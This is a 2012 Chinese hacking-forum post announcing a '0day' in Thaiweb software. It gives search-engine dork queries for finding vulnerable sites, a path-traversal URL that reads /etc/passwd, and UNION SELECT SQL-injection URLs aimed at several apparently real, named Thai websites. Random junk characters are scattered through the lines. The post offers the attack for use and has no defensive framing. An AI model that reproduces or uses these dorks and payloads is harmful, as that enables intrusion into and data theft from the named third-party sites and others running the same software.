找回密码
 立即注册
查看: 2581|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:" _4 ?/ {- ^5 W* n9 h
) N3 z% `  c. n5 _0 y
intext:powered by Thaiweb
0 t5 a1 c. z, l6 W# X: J4 b9 D7 D9 }% \: ?4 U
inurl:index.php?page=board.php9 v/ `$ D& `. Y1 R! T. Q
. v* p' G0 R; G: ?. s
% t; R1 i& L6 }3 J% L

" f6 k) X! X: k1 A利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd5 d& x3 N2 D$ B( a1 L

) v6 I8 T+ {0 |- B+ E" \ ( o( X# C/ p' g
7 M2 x, f. I6 u2 x$ t# z
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
6 ]+ N5 }5 z+ i8 L2 \6 {$ B
4 ~8 H" B: X: m: R6 g4 H. b
8 ^  V7 c1 ~" l- Q( V# U% d4 |; y  c
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--8 n( J) G5 ]' M+ O) e. z9 F5 c2 |
% Y/ ~( J! P) H+ h" c
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
2 j. |  N5 s1 c; A* u+ N $ n8 w' T+ D% Q0 F. S
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
) Q& G1 M8 U* c
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表